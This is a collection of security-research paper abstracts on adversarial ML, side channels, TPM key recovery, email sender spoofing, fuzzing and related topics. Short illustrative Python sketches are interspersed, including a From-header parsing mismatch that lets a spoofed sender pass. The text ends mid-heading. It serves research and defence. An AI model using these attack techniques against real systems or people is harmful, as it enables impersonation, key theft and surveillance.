Here we bridge this gap by conducting the first systematic study on the security of interpretable deep learning systems (IDLSes). We show that existing IDLSes are highly vulnerable to adversarial manipulations. Specifically, we present ADV2, a new class of attacks that generate adversarial inputs not only misleading target DNNs but also deceiving their coupled interpretation models. Through empirical evaluation against four major types of IDLSes on benchmark datasets and in security-critical applications (e.g., skin cancer diagnosis), we demonstrate that with ADV2 the adversary is able to arbitrarily designate an input’s prediction and interpretation. Further, with both analytical and empirical evidence, we identify the prediction-interpretation gap as one root cause of this vulnerability – a DNN and its interpretation model are often misaligned, resulting in the possibility of exploiting both models simultaneously. Finally, we explore potential countermeasures against ADV2, including leveraging its low transferability and incorporating it in an adversarial training framework. Our findings shed light on designing and operating IDLSes in a more secure and informative fashion, leading to several promising research directions.
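
Schematically, the attack optimizes a dual objective; a sketch of the shape of that loss (my simplification of the idea, with caller-supplied arrays):

```python
import numpy as np

def adv2_loss(logits, target_class, attribution, target_attribution, lam=1.0):
    """L = L_prediction (be classified as the attacker's target class)
         + lam * L_interpretation (show a benign-looking attribution map)."""
    p = np.exp(logits - logits.max())
    p /= p.sum()
    pred_loss = -np.log(p[target_class])                      # fool the DNN
    int_loss = np.sum((attribution - target_attribution) ** 2)  # fool the interpreter
    return pred_loss + lam * int_loss
```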

Systems Security

Donky: Domain Keys - Efficient In-Process Isolation for RISC-V and x86

Efficient and secure in-process isolation is in great demand, as evidenced in the shift towards JavaScript and the recent revival of memory protection keys. Yet, state-of-the-art systems do not offer strong security or struggle with frequent domain crossings and oftentimes intrusive kernel modifications. We propose Donky, an efficient hardware-software co-design for strong in-process isolation based on dynamic memory protection domains. The two components of our design are a secure software framework and a non-intrusive hardware extension. We facilitate domain switches entirely in userspace, thus minimizing switching overhead as well as kernel complexity. We show the versatility of Donky in three realistic use cases, secure V8 sandboxing, software vaults, and untrusted third-party libraries. We provide an open-source implementation on a RISC-V Ariane CPU and an Intel-MPK-based emulation mode for x86. We evaluate the security and performance of our implementation for RISC-V synthesized on an FPGA. We also evaluate the performance on x86 and show why our new design is more secure than Intel MPK. Donky does not impede the runtime of in-domain computation. Cross-domain switches are 16–116x faster than regular process context switches. Fully protecting the mbedTLS cryptographic operations has a 4% overhead.

(Mostly) Exitless VM Protection from Untrusted Hypervisor through Disaggregated Nested Virtualization

Today’s cloud tenants are facing severe security threats such as compromised hypervisors, which forces a strong adversary model where the hypervisor should be excluded from the TCB. Previous approaches to shielding guest VMs either suffer from insufficient protection or result in suboptimal performance due to frequent VM exits (especially for I/O operations). This paper presents CloudVisor-D, an efficient nested hypervisor design that embraces both strong protection and high performance. The core idea of CloudVisor-D is to disaggregate the nested hypervisor by separating major protection logics into a protected Guardian-VM alongside each guest VM. The Guardian-VM is securely isolated and protected by the nested hypervisor and provides secure services for most privileged operations like hypercalls, EPT violations and I/O operations from guest VMs. By leveraging recent hardware features, most privileged operations from a guest VM require no VM exits to the nested hypervisor, which are the major sources of performance slowdown in prior designs. We have implemented CloudVisor-D on a commercially available machine with these recent hardware features. Experimental evaluation shows that CloudVisor-D incurs negligible performance overhead even for I/O intensive benchmarks and in some cases outperforms a vanilla hypervisor due to the reduced number of VM exits.

DECAF: Automatic, Adaptive De-bloating and Hardening of COTS Firmware

Once compromised, server firmware can surreptitiously and permanently take over a machine and any stack running thereon, with no hope for recovery, short of hardware-level intervention. To make things worse, modern firmware contains millions of lines of unnecessary code and hundreds of unnecessary modules as a result of a long firmware supply chain designed to optimize time-to-market and cost, but not security. As a result, off-the-shelf motherboards contain large, unnecessarily complex, closed-source vulnerability surfaces that can completely and irreversibly compromise systems.

In this work, we address this problem by dramatically and automatically reducing the vulnerability surface. DECAF is an extensible platform for automatically pruning a wide class of commercial UEFI firmware. DECAF intelligently runs dynamic iterative surgery on UEFI firmware to remove a maximal amount of code with no regressive effects on the functionality and performance of higher layers in the stack (OS, applications).

DECAF has successfully pruned over 70% of unnecessary, redundant, reachable firmware in leading server-grade motherboards with no effect on the upper layers, and increased resulting system performance and boot times.

McTiny: Fast High-Confidence Post-Quantum Key Erasure for Tiny Network Servers

Recent results have shown that some post-quantum cryptographic systems have encryption and decryption performance comparable to fast elliptic-curve cryptography (ECC) or even better. However, this performance metric considers only CPU time and ignores bandwidth and storage. High-confidence post-quantum encryption systems have much larger keys than ECC. For example, the code-based cryptosystem recommended by the PQCRYPTO project uses public keys of 1MB.

Fast key erasure (to provide “forward secrecy”) requires new public keys to be constantly transmitted. Either the server needs to constantly generate, store, and transmit large keys, or it needs to receive, store, and use large keys from the clients. This is not necessarily a problem for overall bandwidth, but it is a problem for storage and computation time on tiny network servers. All straightforward approaches allow easy denial-of-service attacks.

This paper describes a protocol, suitable for today’s networks and tiny servers, in which clients transmit their code-based one-time public keys to servers. Servers never store full client public keys but work on parts provided by the clients, without having to maintain any per-client state. Intermediate results are stored on the client side in the form of encrypted cookies and are eventually combined by the server to obtain the ciphertext. Requirements on the server side are very small: storage of one long-term private key, which is much smaller than a public key, and a few small symmetric cookie keys, which are updated regularly and erased after use. The protocol is highly parallel, requiring only a few round trips, and involves total bandwidth not much larger than a single public key. The total number of packets sent by each side is 971, each fitting into one IPv6 packet of less than 1280 bytes.

The protocol makes use of the structure of encryption in code-based cryptography and benefits from small ciphertexts in code-based cryptography.
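
The "no per-client state" trick is the classic encrypted-cookie pattern; a sketch using PyNaCl's SecretBox as a stand-in for the paper's own symmetric construction (an assumption; install PyNaCl to run it):

```python
import nacl.secret
import nacl.utils

# One small, regularly rotated symmetric key instead of per-client state.
cookie_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)
box = nacl.secret.SecretBox(cookie_key)

def to_cookie(partial_state: bytes) -> bytes:
    """Encrypt intermediate server state and hand it back to the client."""
    return bytes(box.encrypt(partial_state))

def from_cookie(cookie: bytes) -> bytes:
    """Recover the state when the client returns it with the next packet."""
    return box.decrypt(cookie)
```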

Temporal System Call Specialization for Attack Surface Reduction

Attack surface reduction through the removal of unnecessary application features and code is a promising technique for improving security without incurring any additional overhead. Recent software debloating techniques consider an application’s entire lifetime when extracting its code requirements, and reduce the attack surface accordingly.

In this paper, we present temporal specialization, a novel approach for limiting the set of system calls available to a process depending on its phase of execution. Our approach is tailored to server applications, which exhibit distinct initialization and serving phases with different system call requirements. We present novel static analysis techniques for improving the precision of extracting the application’s call graph for each execution phase, which is then used to pinpoint the system calls used in each phase. We show that requirements change throughout the lifetime of servers, and many dangerous system calls (such as execve) can be disabled after the completion of the initialization phase. We have implemented a prototype of temporal specialization on top of the LLVM compiler, and evaluated its effectiveness with six popular server applications. Our results show that it disables 51% more security-critical system calls compared to existing library specialization approaches, while offering the additional benefit of neutralizing 13 more Linux kernel vulnerabilities that could lead to privilege escalation.

Specific User Populations

An Observational Investigation of Reverse Engineers’ Processes

Reverse engineering is a complex process essential to software-security tasks such as vulnerability discovery and malware analysis. Significant research and engineering effort has gone into developing tools to support reverse engineers. However, little work has been done to understand the way reverse engineers think when analyzing programs, leaving tool developers to make interface design decisions based only on intuition.

This paper takes a first step toward a better understanding of reverse engineers’ processes, with the goal of producing insights for improving interaction design for reverse engineering tools. We present the results of a semi-structured, observational interview study of reverse engineers (N=16). Each observation investigated the questions reverse engineers ask as they probe a program, how they answer these questions, and the decisions they make throughout the reverse engineering process. From the interview responses, we distill a model of the reverse engineering process, divided into three phases: overview, sub-component scanning, and focused experimentation. Each analysis phase’s results feed the next as reverse engineers’ mental representations become more concrete. We find that reverse engineers typically use static methods in the first two phases, but dynamic methods in the final phase, with experience playing large, but varying, roles in each phase. Based on these results, we provide five interaction design guidelines for reverse engineering tools.

The Tools and Tactics Used in Intimate Partner Surveillance: An Analysis of Online Infidelity Forums

Abusers increasingly use spyware apps, account compromise, and social engineering to surveil their intimate partners, causing substantial harms that can culminate in violence. This form of privacy violation, termed intimate partner surveillance (IPS), is a profoundly challenging problem to address due to the physical access and trust present in the relationship between the target and attacker. While previous research has examined IPS from the perspectives of survivors, we present the first measurement study of online forums in which (potential) attackers discuss IPS strategies and techniques. In domains such as cybercrime, child abuse, and human trafficking, studying the online behaviors of perpetrators has led to better threat intelligence and techniques to combat attacks. We aim to provide similar insights in the context of IPS. We identified five online forums containing discussion of monitoring cellphones and other means of surveilling an intimate partner, including three within the context of investigating relationship infidelity. We perform a mixed-methods analysis of these forums, surfacing the tools and tactics that attackers use to perform surveillance. Via qualitative analysis of forum content, we present a taxonomy of IPS strategies used and recommended by attackers, and synthesize lessons for technologists seeking to curb the spread of IPS.

DatashareNetwork: A Decentralized Privacy-Preserving Search Engine for Investigative Journalists

Investigative journalists collect large numbers of digital documents during their investigations. These documents can greatly benefit other journalists’ work. However, many of these documents contain sensitive information. Hence, possessing such documents can endanger reporters, their stories, and their sources. Consequently, many documents are used only for single, local, investigations. We present DatashareNetwork, a decentralized and privacy-preserving search system that enables journalists worldwide to find documents via a dedicated network of peers. DatashareNetwork combines well-known anonymous authentication mechanisms and anonymous communication primitives, a novel asynchronous messaging system, and a novel multi-set private set intersection protocol (MS-PSI) into a decentralized peer-to-peer private document search engine. Using a prototype implementation, we show that DatashareNetwork is secure and scales to thousands of users and millions of documents.

“I am uncomfortable sharing what I can’t see”: Privacy Concerns of the Visually Impaired with Camera Based Assistive Applications

The emergence of camera-based assistive technologies has empowered people with visual impairments (VIPs) to obtain independence in their daily lives. Popular services feature volunteers who answer questions about photos or videos (e.g., to identify a medical prescription). However, VIPs can (inadvertently) reveal sensitive information to these volunteers. To better understand the privacy concerns regarding the disclosure of background objects to different types of human assistants (friends, family, and others), we conducted an online survey with 155 visually impaired participants. In general, our participants had varying concerns depending on the type of assistant and the kind of information. We found that our participants were more concerned about the privacy of bystanders than their own when capturing people in images. We also found that participants were concerned about self-presentation and were more comfortable sharing embarrassing information with family than with their friends. Our findings suggest directions for future work in the development of human-assisted question-answering systems. Specifically, we discuss how humanizing these systems can give people a greater sense of personal security.

‘I have too much respect for my elders’: Understanding South African Mobile Users’ Perceptions of Privacy and Current Behaviors on Facebook and WhatsApp

Facebook usage is growing in developing countries, but we know little about how to tailor social media privacy settings to users in resource-constrained settings. To that end, we present findings from interviews of 52 current mobile social media users in South Africa. We found users’ primary privacy-related concern was who else could see their posts and messages, not what data the platforms or advertisers collect about them. Second, users displayed general knowledge gaps on existing social media privacy settings and relied heavily on blocking and passwords for privacy protection. Third, users’ privacy and security-related behaviors were heavily influenced by living in high-crime areas. Based on these findings, we make recommendations for future work to better serve user privacy and security needs in resource-constrained settings.

Side Channel Attacks

RELOAD+REFRESH: Abusing Cache Replacement Policies to Perform Stealthy Cache Attacks

Caches have become the prime method for unintended information extraction across logical isolation boundaries. They are widely available on all major CPU platforms and, as a side channel, caches provide great resolution, making them the most convenient channel for Spectre and Meltdown. As a consequence, several methods to stop cache attacks by detecting them have been proposed. Detection is strongly aided by the fact that observing cache activity of co-resident processes is not possible without altering the cache state and thereby forcing evictions on the observed processes. In this work we show that this widely held assumption is incorrect. Through clever usage of the cache replacement policy, it is possible to track cache accesses of a victim’s process without forcing evictions on the victim’s data. Hence, online detection mechanisms that rely on these evictions can be circumvented as they would not detect the introduced RELOAD+REFRESH attack. The attack requires a profound understanding of the cache replacement policy. We present a methodology to recover the replacement policy and apply it to the last five generations of Intel processors. We further show empirically that the performance of RELOAD+REFRESH on cryptographic implementations is comparable to that of other widely used cache attacks, while detection methods that rely on L3 cache events are successfully thwarted.

Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections

To perform successful remote timing attacks, an adversary typically collects a series of network timing measurements and subsequently performs statistical analysis to reveal a difference in execution time. The number of measurements that must be obtained largely depends on the amount of jitter that the requests and responses are subjected to. In remote timing attacks, a significant source of jitter is the network path between the adversary and the targeted server, making it practically infeasible to successfully exploit timing side-channels that exhibit only a small difference in execution time.

In this paper, we introduce a conceptually novel type of timing attack that leverages the coalescing of packets by network protocols and concurrent handling of requests by applications. These concurrency-based timing attacks infer a relative timing difference by analyzing the order in which responses are returned, and thus do not rely on any absolute timing information. We show how these attacks result in a 100-fold improvement over typical timing attacks performed over the Internet, and can accurately detect timing differences as small as 100ns, similar to attacks launched on a local system. We describe how these timing attacks can be successfully deployed against HTTP/2 webservers, Tor onion services, and EAP-pwd, a popular Wi-Fi authentication method.
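
The statistical core is strikingly simple: only the order of the two coalesced responses is observed per trial, never a timestamp. A sketch of the inference step (my formulation; thresholds in a real attack would be calibrated per target):

```python
def infer_from_order(order_samples, threshold=0.6):
    """Two requests are packed into a single packet so they arrive together;
    each trial records only which response returned first.
    order_samples: list of booleans, True when request A's response came first."""
    frac_a_first = sum(order_samples) / len(order_samples)
    if frac_a_first > threshold:
        return "A completes faster"
    if frac_a_first < 1.0 - threshold:
        return "B completes faster"
    return "no measurable difference"
```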

Cache Telepathy: Leveraging Shared Resource Attacks to Learn DNN Architectures

Deep Neural Networks (DNNs) are fast becoming ubiquitous for their ability to attain good accuracy in various machine learning tasks. A DNN’s architecture (i.e., its hyperparameters) broadly determines the DNN’s accuracy and performance, and is often confidential. Attacking a DNN in the cloud to obtain its architecture can potentially provide major commercial value. Further, attaining a DNN’s architecture facilitates other existing DNN attacks.

This paper presents Cache Telepathy: an efficient mechanism to help obtain a DNN’s architecture using the cache side channel. The attack is based on the insight that DNN inference relies heavily on tiled GEMM (Generalized Matrix Multiply), and that DNN architecture parameters determine the number of GEMM calls and the dimensions of the matrices used in the GEMM functions. Such information can be leaked through the cache side channel.

This paper uses Prime+Probe and Flush+Reload to attack the VGG and ResNet DNNs running OpenBLAS and Intel MKL libraries. Our attack is effective in helping obtain the DNN architectures by very substantially reducing the search space of target DNN architectures. For example, when attacking the OpenBLAS library, for the different layers in VGG-16, it reduces the search space from more than 5.4×10^12 architectures to just 16; for the different modules in ResNet-50, it reduces the search space from more than 6×10^46 architectures to only 512.
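
For intuition, the GEMM-to-architecture mapping is direct in the simplest case (a toy sketch for a plain MLP; convolutions, tiling, and sub-matrix counting make the real analysis substantially harder):

```python
def mlp_layers_from_gemm_trace(gemm_dims):
    """Each fully-connected layer is one GEMM C(m,n) = A(m,k) x B(k,n), with
    m the batch size, k the layer's inputs, and n its neurons -- so (m, n, k)
    triples recovered via the cache side channel reveal layer sizes, and the
    call count reveals depth."""
    return [{"inputs": k, "neurons": n} for (m, n, k) in gemm_dims]

# e.g. a 784-512-10 MLP on a batch of 64:
# mlp_layers_from_gemm_trace([(64, 512, 784), (64, 10, 512)])
```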

Certified Side Channels

We demonstrate that the format in which private keys are persisted impacts Side Channel Analysis (SCA) security. Surveying several widely deployed software libraries, we investigate the formats they support, how they parse these keys, and what runtime decisions they make. We uncover a combination of weaknesses and vulnerabilities, in extreme cases inducing completely disjoint multi-precision arithmetic stacks deep within the cryptosystem level for keys that otherwise seem logically equivalent. Exploiting these vulnerabilities, we design and implement key recovery attacks utilizing signals ranging from electromagnetic (EM) emanations, to granular microarchitecture cache timings, to coarse traditional wall clock timings.

NetWarden: Mitigating Network Covert Channels while Preserving Performance

Network covert channels are an advanced threat to the security of distributed systems. Existing defenses all come at the cost of performance, so they present significant barriers to a practical deployment in high-speed networks. We propose NetWarden, a novel defense whose key design goal is to preserve TCP performance while mitigating covert channels. The use of programmable data planes makes it possible for NetWarden to adapt defenses that were only demonstrated before as proof of concept, and apply them at linespeed. Moreover, NetWarden uses a set of performance boosting techniques to temporarily increase the performance of connections that have been affected by covert channel mitigation, with the ultimate goal of neutralizing the overall performance impact. NetWarden also uses a fastpath/slowpath architecture to combine the generality of software and the efficiency of hardware for effective defense. Our evaluation shows that NetWarden works smoothly with complex applications and workloads, and that it can mitigate covert timing and storage channels with little performance disturbance.

TPM-FAIL: TPM meets Timing and Lattice Attacks

Trusted Platform Module (TPM) serves as a hardware-based root of trust that protects cryptographic keys from privileged system and physical adversaries. In this work, we perform a black-box timing analysis of TPM 2.0 devices deployed on commodity computers. Our analysis reveals that some of these devices feature secret-dependent execution times during signature generation based on elliptic curves. In particular, we discovered timing leakage on an Intel firmware-based TPM as well as a hardware TPM. We show how this information allows an attacker to apply lattice techniques to recover 256-bit private keys for ECDSA and ECSchnorr signatures. On Intel fTPM, our key recovery succeeds after about 1,300 observations and in less than two minutes. Similarly, we extract the private ECDSA key from a hardware TPM manufactured by STMicroelectronics, which is certified at Common Criteria (CC) EAL 4+, after fewer than 40,000 observations. We further highlight the impact of these vulnerabilities by demonstrating a remote attack against a StrongSwan IPsec VPN that uses a TPM to generate the digital signatures for authentication. In this attack, the remote client recovers the server’s private authentication key by timing only 45,000 authentication handshakes via a network connection.

The vulnerabilities we have uncovered emphasize the difficulty of correctly implementing known constant-time techniques, and show the importance of evolutionary testing and transparent evaluation of cryptographic implementations. Even certified devices that claim resistance against attacks require additional scrutiny by the community and industry, as we learn more about these attacks.

Authentication

That Was Then, This Is Now: A Security Evaluation of Password Generation, Storage, and Autofill in Browser-Based Password Managers

Password managers have the potential to help users more effectively manage their passwords and address many of the concerns surrounding password-based authentication. However, prior research has identified significant vulnerabilities in existing password managers, especially in browser-based password managers, which are the focus of this paper. Since that time, five years have passed, leaving it unclear whether password managers remain vulnerable or whether they have addressed known security concerns. To answer this question, we evaluate thirteen popular password managers and consider all three stages of the password manager lifecycle—password generation, storage, and autofill. Our evaluation is the first analysis of password generation in password managers, finding several non-random character distributions and identifying instances where generated passwords were vulnerable to online and offline guessing attacks. For password storage and autofill, we replicate past evaluations, demonstrating that while password managers have improved in the half-decade since those prior evaluations, there are still significant issues; these problems include unencrypted metadata, insecure defaults, and vulnerabilities to clickjacking attacks. Based on our results, we identify password managers to avoid, provide recommendations on how to improve existing password managers, and identify areas of future research.
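The paper's randomness analysis of generated passwords boils down to statistics over large samples. A minimal way to reproduce the spirit of that check is a chi-square test of character frequencies against a uniform model; the sketch below uses a stand-in generator, where a real study would sample the password manager itself:

```python
# Sketch: test generated passwords for non-uniform character frequencies.
import secrets
import string
from collections import Counter

ALPHABET = string.ascii_letters + string.digits

def generate_password(length=16):
    # Stand-in generator; a real study samples the password manager itself.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def chi_square_uniform(samples):
    """Chi-square statistic of observed character counts vs. a uniform model."""
    counts = Counter(ch for pw in samples for ch in pw)
    total = sum(counts.values())
    expected = total / len(ALPHABET)
    return sum((counts.get(ch, 0) - expected) ** 2 / expected for ch in ALPHABET)

passwords = [generate_password() for _ in range(10_000)]
stat = chi_square_uniform(passwords)
# With 61 degrees of freedom (62 symbols - 1), values far above ~90
# suggest a skewed character distribution worth investigating.
print(f"chi-square statistic: {stat:.1f}")
```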

Composition Kills: A Case Study of Email Sender Authentication

Component-based software design is a primary engineering approach for building modern software systems. This programming paradigm, however, creates security concerns due to the potential for inconsistent interpretations of messages between different components. In this paper, we leverage such inconsistencies to identify vulnerabilities in email systems. We identify a range of techniques to induce inconsistencies among different components across email servers and clients. We show that these inconsistencies can enable attackers to bypass email authentication to impersonate arbitrary senders, and forge DKIM-signed emails with a legitimate site’s signature. Using a combination of manual analysis and black-box fuzzing, we discovered 18 types of evasion exploits and tested them against 10 popular email providers and 19 email clients—all of which proved vulnerable to various attacks. Absent knowledge of our attacks, for many of them even a conscientious security professional using a state-of-the-art email provider service like Gmail cannot with confidence readily determine, when receiving an email, whether it is forged.
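The inconsistency class the paper exploits is easy to illustrate; the example below is generic, not one of the paper's 18 specific exploits. Two components parsing the same From header can disagree about who the sender is:

```python
# Two "components" parsing the same crafted From header disagree.
import re
from email.utils import parseaddr

# The display name contains something that looks like an address,
# while the real routing address sits in angle brackets.
header = '"admin@legitimate.example" <attacker@evil.example>'

# Component A: an RFC-compliant parser takes the angle-bracket address.
_, rfc_address = parseaddr(header)

# Component B: a naive filter that grabs the first thing shaped like an
# email address (a pattern seen in ad-hoc validation code).
naive_address = re.search(r"[\w.+-]+@[\w.-]+", header).group(0)

print("RFC parser sees:  ", rfc_address)    # attacker@evil.example
print("naive filter sees:", naive_address)  # admin@legitimate.example
# If the authentication check uses one view while the mail client
# displays the other, a spoofed sender slips through.
```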

Detecting Stuffing of a User’s Credentials at Her Own Accounts

We propose a framework by which websites can coordinate to detect credential stuffing on individual user accounts. Our detection algorithm teases apart normal login behavior (involving password reuse, entering correct passwords into the wrong sites, etc.) from credential stuffing, by leveraging modern anomaly detection and carefully tracking suspicious logins. Websites coordinate using a novel private membership-test protocol, thereby ensuring that information about passwords is not leaked; this protocol is highly scalable, partly due to its use of cuckoo filters, and is more secure than similarly scalable alternatives in an important measure that we define. We use probabilistic model checking to estimate our credential-stuffing detection accuracy across a range of operating points. These methods might be of independent interest for their novel application of formal methods to estimate the usability impacts of our design. We show that even a minimal-infrastructure deployment of our framework should already support the combined login load experienced by the airline, hotel, retail, and consumer banking industries in the U.S.
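The protocol's scalability leans on cuckoo filters. A minimal (non-private) cuckoo filter sketch shows the approximate-membership building block; the cryptographic blinding of the real protocol is omitted and all parameters are illustrative:

```python
# Minimal cuckoo filter: the approximate-membership structure underlying
# the paper's private membership-test protocol (blinding omitted).
import hashlib
import random

class CuckooFilter:
    def __init__(self, num_buckets=1024, bucket_size=4, max_kicks=500):
        self.buckets = [[] for _ in range(num_buckets)]
        self.bucket_size = bucket_size
        self.max_kicks = max_kicks
        self.n = num_buckets

    def _fp(self, item):
        return hashlib.sha256(item.encode()).hexdigest()[:4]  # short fingerprint

    def _h(self, x):
        return int(hashlib.sha256(x.encode()).hexdigest(), 16) % self.n

    def _slots(self, item):
        fp = self._fp(item)
        i1 = self._h(item)
        i2 = (i1 ^ self._h(fp)) % self.n  # partial-key cuckoo hashing
        return fp, i1, i2

    def insert(self, item):
        fp, i1, i2 = self._slots(item)
        for i in (i1, i2):
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        i = random.choice((i1, i2))
        for _ in range(self.max_kicks):  # evict a fingerprint and relocate it
            j = random.randrange(len(self.buckets[i]))
            fp, self.buckets[i][j] = self.buckets[i][j], fp
            i = (i ^ self._h(fp)) % self.n
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        return False  # filter is full

    def contains(self, item):
        fp, i1, i2 = self._slots(item)
        return fp in self.buckets[i1] or fp in self.buckets[i2]

cf = CuckooFilter()
cf.insert("alice:hunter2")
print(cf.contains("alice:hunter2"))   # True
print(cf.contains("alice:password"))  # False (with high probability)
```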

Liveness is Not Enough: Enhancing Fingerprint Authentication with Behavioral Biometrics to Defeat Puppet Attacks

Fingerprint authentication has gained increasing popularity on mobile devices in recent years. However, it is vulnerable to presentation attacks, such as an attacker spoofing the sensor with an artificial replica. Many liveness detection solutions have been proposed to defeat such presentation attacks; however, they all fail to defend against a particular type of presentation attack, namely puppet attack, in which an attacker places an unwilling victim’s finger on the fingerprint sensor. In this paper, we propose FINAUTH, an effective and efficient software-only solution, to complement fingerprint authentication by defeating both synthetic spoofs and puppet attacks using fingertip-touch characteristics. FINAUTH characterizes intrinsic fingertip-touch behaviors including the acceleration and the rotation angle of mobile devices when a legitimate user authenticates. FINAUTH only utilizes common sensors equipped on mobile devices and does not introduce extra usability burdens on users. To evaluate the effectiveness of FINAUTH, we carried out experiments on datasets collected from 90 subjects after the IRB approval. The results show that FINAUTH can achieve the average balanced accuracy of 96.04% with 5 training data points and 99.28% with 100 training data points. Security experiments also demonstrate that FINAUTH is resilient against possible attacks. In addition, we report the usability analysis results of FINAUTH, including user authentication delay and overhead.

Human Distinguishable Visual Key Fingerprints

Visual fingerprints are used in human verification of identities to improve security against impersonation attacks. The verification requires the user to confirm that the visual fingerprint image derived from the trusted source is the same as the one derived from the unknown source. We introduce CEAL, a novel mechanism to build generators for visual fingerprint representations of arbitrary public strings. CEAL stands out from existing approaches in three significant aspects: (1) eliminates the need for hand curated image generation rules by learning a generator model that imitates the style and domain of fingerprint images from a large collection of sample images, hence enabling easy customizability, (2) operates within limits of the visual discriminative ability of human perception, such that the learned fingerprint image generator avoids mapping distinct keys to images which are not distinguishable by humans, and (3) the resulting model deterministically generates realistic fingerprint images from an input vector, where the vector components are designated to control visual properties which are either readily perceptible to a human eye, or imperceptible, yet necessary for accurately modeling the target image domain.

Unlike existing visual fingerprint generators, CEAL factors in the limits of human perception, and pushes the key payload capacity of the images toward the limits of its generative model: We have built a generative network for nature landscape images which can reliably encode 123 bits of entropy in the fingerprint. We label 3,996 image pairs by 931 participants. In experiments with 402 million attack image pairs, we found that pre-image attacks performed by adversaries equipped with the human perception discriminators that we build, achieve a success rate against CEAL that is at most 0.0002%. The CEAL generator model is small (67MB) and efficient (2.3s to generate an image fingerprint on a laptop).

Fuzzing 1

FuzzGuard: Filtering out Unreachable Inputs in Directed Grey-box Fuzzing through Deep Learning

Recently, directed grey-box fuzzing (DGF) has become popular in the field of software testing. Different from coverage-based fuzzing whose goal is to increase code coverage for triggering more bugs, DGF is designed to check whether a piece of potentially buggy code (e.g., string operations) really contains a bug. Ideally, all the inputs generated by DGF should reach the target buggy code until triggering the bug. Executing unreachable inputs is a waste of time. Unfortunately, in real situations, large numbers of the generated inputs cannot drive the program to the target, greatly impacting the efficiency of fuzzing, especially when the buggy code is embedded in code guarded by various constraints.

In this paper, we propose a deep-learning-based approach to predict the reachability of inputs (i.e., whether they miss the target or not) before executing the target program, helping DGF filter out the unreachable ones to boost the performance of fuzzing. To apply deep learning with DGF, we design a suite of new techniques (e.g., a step-forwarding approach and representative data selection) to solve the problems of unbalanced labeled data and insufficient time in the training process. Further, we implement the proposed approach, called FuzzGuard, and equip it with a state-of-the-art DGF (e.g., AFLGo). Evaluations on 45 real vulnerabilities show that FuzzGuard boosts the fuzzing efficiency of the vanilla AFLGo by up to 17.1×. Finally, to understand the key features learned by FuzzGuard, we illustrate their connection with the constraints in the programs.
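The filtering loop itself is simple: put the learned reachability predictor in front of the executor and spend executions only on inputs predicted to reach the target. Below is a runnable toy under obviously simplified assumptions (a fake target where only first bytes below 0x10 reach the buggy code, and a trivial prefix heuristic standing in for FuzzGuard's deep model):

```python
# Toy version of the FuzzGuard idea: predict reachability before executing.
import random

random.seed(0)

def reaches_target(data):            # stand-in for an instrumented execution
    return data[0] < 0x10            # fake target: first byte gates the bug

def mutate(seed):
    pos = random.randrange(len(seed))
    return seed[:pos] + bytes([random.randrange(256)]) + seed[pos + 1:]

good_prefixes = set()                # trivial "model" state, trained online
seeds = [bytes(8)]
executed = skipped = 0

for i in range(20_000):
    cand = mutate(random.choice(seeds))
    # Warm-up phase: execute everything so the model sees labeled data.
    predicted_reachable = i < 2_000 or cand[0] in good_prefixes
    if not predicted_reachable:
        skipped += 1                 # saved one execution
        continue
    executed += 1
    if reaches_target(cand):
        good_prefixes.add(cand[0])   # online model update
        seeds.append(cand)

print(f"executed {executed}, filtered {skipped} predicted-unreachable inputs")
```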

FuzzGen: Automatic Fuzzer Generation

Fuzzing is a testing technique to discover unknown vulnerabilities in software. When applying fuzzing to libraries, the core idea of supplying random input remains unchanged, yet it is non-trivial to achieve good code coverage. Libraries cannot run as standalone programs, but instead are invoked through another application. Triggering code deep in a library remains challenging as specific sequences of API calls are required to build up the necessary state. Libraries are diverse and have unique interfaces that require unique fuzzers, so far written by a human analyst.

To address this issue, we present FuzzGen, a tool for automatically synthesizing fuzzers for complex libraries in a given environment. FuzzGen leverages a whole system analysis to infer the library’s interface and synthesizes fuzzers specifically for that library. FuzzGen requires no human interaction and can be applied to a wide range of libraries. Furthermore, the generated fuzzers leverage LibFuzzer to achieve better code coverage and expose bugs that reside deep in the library.

FuzzGen was evaluated on Debian and the Android Open Source Project (AOSP) selecting 7 libraries to generate fuzzers. So far, we have found 17 previously unpatched vulnerabilities with 6 assigned CVEs. The generated fuzzers achieve an average of 54.94% code coverage; an improvement of 6.94% when compared to manually written fuzzers, demonstrating the effectiveness and generality of FuzzGen.

ParmeSan: Sanitizer-guided Greybox Fuzzing

One of the key questions when fuzzing is where to look for vulnerabilities. Coverage-guided fuzzers indiscriminately optimize for covering as much code as possible given that bug coverage often correlates with code coverage. Since code coverage overapproximates bug coverage, this approach is less than ideal and may lead to non-trivial time-to-exposure (TTE) of bugs. Directed fuzzers try to address this problem by directing the fuzzer to a basic block with a potential vulnerability. This approach can greatly reduce the TTE for a specific bug, but such special-purpose fuzzers can then greatly underapproximate overall bug coverage.

In this paper, we present sanitizer-guided fuzzing, a new design point in this space that specifically optimizes for bug coverage. For this purpose, we make the key observation that while the instrumentation performed by existing software sanitizers is regularly used for detecting fuzzer-induced error conditions, it can further serve as a generic and effective mechanism to identify interesting basic blocks for guiding fuzzers. We present the design and implementation of ParmeSan, a new sanitizer-guided fuzzer that builds on this observation. We show that ParmeSan greatly reduces the TTE of real-world bugs, and finds bugs 37% faster than existing state-of-the-art coverage-based fuzzers (Angora) and 288% faster than directed fuzzers (AFLGo), while still covering the same set of bugs.

EcoFuzz: Adaptive Energy-Saving Greybox Fuzzing as a Variant of the Adversarial Multi-Armed Bandit

